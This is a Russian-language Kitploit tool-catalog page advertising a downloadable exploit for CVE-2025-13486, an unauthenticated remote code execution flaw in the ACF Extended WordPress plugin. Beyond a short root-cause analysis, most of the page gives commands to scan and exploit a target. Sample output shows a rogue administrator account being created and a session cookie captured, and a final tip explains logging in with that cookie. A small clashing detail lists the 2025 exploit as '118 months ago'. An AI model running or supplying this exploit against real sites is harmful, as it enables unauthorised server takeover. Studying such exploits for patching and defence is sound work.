Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-13486 — CVE-2025-13486 - Remote Code Execution & Privilege Escalation exploit | Kitploit
Инструменты/GitHubGitHub/whattheslime/cve-2025-13486
Privilege EscalationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubwhattheslime/cve-2025-13486

CVE-2025-13486

CVE-2025-13486 - Remote Code Execution & Privilege Escalation exploit

Репозиторий
118 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт CVE-2025-13486

Плагин ACF Extended для WordPress — удаленное выполнение кода и повышение привилегий

Эксплойт для CVE-2025-13486, обнаруженный Marcin Dudek (dudekmar)

⚠️ Отказ от ответственности

Этот репозиторий предоставлен только для исследовательских и защитных целей. Автор не несет ответственности за неправомерное использование этой информации.


📌 Обзор

Плагин Advanced Custom Fields: Extended (ACFE) для WordPress уязвим к удаленному выполнению кода (RCE) в версиях 0.9.0.5 – 0.9.1.1.

Уязвимость находится в функции prepare_form(), которая принимает ввод, контролируемый пользователем, и передает его в call_user_func_array() без надлежащей проверки.

Это позволяет неаутентифицированным злоумышленникам выполнять произвольный PHP-код на сервере в ограниченном объеме, что, тем не менее, достаточно для создания учетной записи администратора и входа в систему.


🔬 Анализ первопричины

Цепочка уязвимости выглядит следующим образом:

  1. includes/modules/form/module-form-front.php:24 -> действие wp_ajax_nopriv_acfe/form/render_form_ajax запускает обработчик render_form_ajax.

  2. includes/modules/form/module-form-front.php:492 -> применяется фильтр acfe/form/prepare_form, вызывающий функцию prepare_form().

  3. includes/modules/form/module-form-front-render.php:151 -> данные $form, контролируемые пользователем, напрямую передаются в call_user_func_array().


🎯 Эксплуатация

  1. Установите зависимости Python:

    root@kitploit:~
    python3 -m venv venv
    venv/bin/pip install -r requirements.txt
    
  2. Определите уязвимую цель WordPress.

    Цель должна содержать страницу с формой, созданной ACFE.

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
    

    Пример вывода:

    root@kitploit:~
    [2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
    
  3. Запустите скрипт снова с флагом --exploit:

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
    

    Пример вывода:

    root@kitploit:~
    [2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
    [2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
    [2025-12-19] [11:00:14] [success] Authentication succeded!
    [2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
    

📚 Ссылки

  • https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended/advanced-custom-fields-extended-0905-0911-unauthenticated-remote-code-execution-in-prepare-form
  • https://sploitus.com/exploit?id=13551590-2822-5E83-9737-F55F4B2F9F82
Скачать инструмент
  • Используйте полученный cookie аутентификации WordPress для входа под вновь созданной учетной записью администратора.